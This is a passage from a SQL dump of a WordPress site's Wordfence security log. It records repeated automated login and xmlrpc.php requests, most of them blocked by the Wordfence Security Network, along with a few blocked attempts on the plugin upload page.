Wordfence Security Network',NULL),(11835,0.000000,1631112393.300393,'\0\0\0\0\0\0\0\0\0\0���j#�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11836,0.000000,1631112843.011879,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11837,0.000000,1631113158.671659,'\0\0\0\0\0\0\0\0\0\0���\0�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11838,0.000000,1631113955.072324,'\0\0\0\0\0\0\0\0\0\0��/aP3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11839,0.000000,1631114752.912654,'\0\0\0\0\0\0\0\0\0\0���c\rZ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11840,0.000000,1631115002.863559,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11841,0.000000,1631115570.505300,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11842,0.000000,1631116127.527790,'\0\0\0\0\0\0\0\0\0\0���6�K',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11843,1631116128.848637,1631116128.768600,'\0\0\0\0\0\0\0\0\0\0���6�K',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11844,0.000000,1631116218.649887,'\0\0\0\0\0\0\0\0\0\0���6�F',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0','loginFailInvalidUsername',NULL,NULL),(11845,0.000000,1631116343.553564,'\0\0\0\0\0\0\0\0\0\0����~�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11846,0.000000,1631116782.985052,'\0\0\0\0\0\0\0\0\0\0��X�$�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11847,0.000000,1631117153.726189,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11848,0.000000,1631117263.724665,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11849,0.000000,1631117670.396379,'\0\0\0\0\0\0\0\0\0\0��t>f�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11850,0.000000,1631118053.968733,'\0\0\0\0\0\0\0\0\0\0��|�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11851,0.000000,1631118411.646293,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11852,0.000000,1631118717.301078,'\0\0\0\0\0\0\0\0\0\0�����f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11853,0.000000,1631118972.385745,'\0\0\0\0\0\0\0\0\0\0��g',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11854,0.000000,1631119249.219966,'\0\0\0\0\0\0\0\0\0\0����P�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11855,0.000000,1631119796.410419,'\0\0\0\0\0\0\0\0\0\0���C�u',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11856,0.000000,1631120066.813861,'\0\0\0\0\0\0\0\0\0\0��/aP3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11857,0.000000,1631120237.486254,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0','loginFailInvalidUsername',NULL,NULL),(11858,0.000000,1631120313.970346,'\0\0\0\0\0\0\0\0\0\0��-wT�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11859,0.000000,1631120588.967478,'\0\0\0\0\0\0\0\0\0\0���\r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11860,0.000000,1631120839.385704,'\0\0\0\0\0\0\0\0\0\0���쬺',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11861,0.000000,1631121094.043875,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11862,0.000000,1631121352.177534,'\0\0\0\0\0\0\0\0\0\0��[ͯ#',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11863,0.000000,1631121597.203805,'\0\0\0\0\0\0\0\0\0\0���Y3�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11864,0.000000,1631121860.887932,'\0\0\0\0\0\0\0\0\0\0��.e_A',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11865,0.000000,1631122077.640094,'\0\0\0\0\0\0\0\0\0\0��g��E',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11866,0.000000,1631122344.219743,'\0\0\0\0\0\0\0\0\0\0���c]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11867,0.000000,1631122599.512671,'\0\0\0\0\0\0\0\0\0\0���$-I',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11868,0.000000,1631122841.605993,'\0\0\0\0\0\0\0\0\0\0���ф',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11869,0.000000,1631123084.866020,'\0\0\0\0\0\0\0\0\0\0���}z/',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11870,0.000000,1631123312.097109,'\0\0\0\0\0\0\0\0\0\0�����$',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11871,0.000000,1631123575.409918,'\0\0\0\0\0\0\0\0\0\0��$\\',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11872,0.000000,1631123825.230217,'\0\0\0\0\0\0\0\0\0\0���q��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11873,0.000000,1631124057.933981,'\0\0\0\0\0\0\0\0\0\0���c6',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11874,0.000000,1631124309.092611,'\0\0\0\0\0\0\0\0\0\0��˫�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11875,0.000000,1631124511.675773,'\0\0\0\0\0\0\0\0\0\0����w�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11876,0.000000,1631124761.823344,'\0\0\0\0\0\0\0\0\0\0���q�u',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11877,0.000000,1631125004.279799,'\0\0\0\0\0\0\0\0\0\0��X�$�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11878,0.000000,1631125200.539634,'\0\0\0\0\0\0\0\0\0\0���G�%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11879,0.000000,1631125446.260558,'\0\0\0\0\0\0\0\0\0\0����w.',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11880,0.000000,1631125683.157466,'\0\0\0\0\0\0\0\0\0\0���Ʊj',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11881,0.000000,1631125883.065904,'\0\0\0\0\0\0\0\0\0\0����3�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11882,0.000000,1631126123.761982,'\0\0\0\0\0\0\0\0\0\0��\'gI�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11883,0.000000,1631126364.108054,'\0\0\0\0\0\0\0\0\0\0��n-p',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11884,0.000000,1631126594.019790,'\0\0\0\0\0\0\0\0\0\0��ca�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11885,0.000000,1631126868.612869,'\0\0\0\0\0\0\0\0\0\0���,�7',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11886,0.000000,1631127102.868013,'\0\0\0\0\0\0\0\0\0\0��g�6�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11887,0.000000,1631127329.919953,'\0\0\0\0\0\0\0\0\0\0���cN�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11888,0.000000,1631127600.642225,'\0\0\0\0\0\0\0\0\0\0��3�8�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11889,0.000000,1631127848.420604,'\0\0\0\0\0\0\0\0\0\0���R-',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11890,0.000000,1631128083.904813,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11891,0.000000,1631128356.269591,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11892,0.000000,1631128580.821803,'\0\0\0\0\0\0\0\0\0\0���Q֨',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11893,0.000000,1631128830.399918,'\0\0\0\0\0\0\0\0\0\0��3Q�x',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11894,0.000000,1631129112.179875,'\0\0\0\0\0\0\0\0\0\0��g9��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11895,0.000000,1631129366.301196,'\0\0\0\0\0\0\0\0\0\0��PP��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11896,0.000000,1631129623.282197,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11897,0.000000,1631129869.965004,'\0\0\0\0\0\0\0\0\0\0��˖0v',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11898,0.000000,1631130141.248348,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11899,0.000000,1631130402.041144,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11900,0.000000,1631130637.613961,'\0\0\0\0\0\0\0\0\0\0���c�X',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11901,0.000000,1631130929.980127,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11902,0.000000,1631131183.294193,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11903,0.000000,1631131443.055512,'\0\0\0\0\0\0\0\0\0\0��E��|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11904,0.000000,1631131714.239843,'\0\0\0\0\0\0\0\0\0\0��gR',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11905,0.000000,1631131979.759536,'\0\0\0\0\0\0\0\0\0\0��)]R',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11906,0.000000,1631132240.109502,'\0\0\0\0\0\0\0\0\0\0���3�:',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11907,0.000000,1631132491.901578,'\0\0\0\0\0\0\0\0\0\0�����1',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(11908,0.000000,1631132779.753490,'\0\0\0\0\0\0\0\0\0\0��g�\n�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11909,0.000000,1631133045.792418,'\0\0\0\0\0\0\0\0\0\0���[K	',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11910,0.000000,1631133314.842146,'\0\0\0\0\0\0\0\0\0\0����{�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11911,0.000000,1631133592.779038,'\0\0\0\0\0\0\0\0\0\0��g9��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11912,0.000000,1631133864.863830,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11913,0.000000,1631134428.664186,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11914,0.000000,1631134684.997370,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11915,1631134686.337804,1631134686.260900,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11916,0.000000,1631134696.621540,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11917,0.000000,1631134859.153201,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11918,1631134860.567057,1631134860.462900,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11919,0.000000,1631134971.469696,'\0\0\0\0\0\0\0\0\0\0��H�*-',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11920,0.000000,1631135263.582656,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11921,0.000000,1631135542.817472,'\0\0\0\0\0\0\0\0\0\0���;,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11922,0.000000,1631136095.579782,'\0\0\0\0\0\0\0\0\0\0�����|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11923,0.000000,1631136382.119938,'\0\0\0\0\0\0\0\0\0\0��/J�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11924,0.000000,1631136659.633334,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11925,0.000000,1631136943.383122,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11926,0.000000,1631137237.575031,'\0\0\0\0\0\0\0\0\0\0����d',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 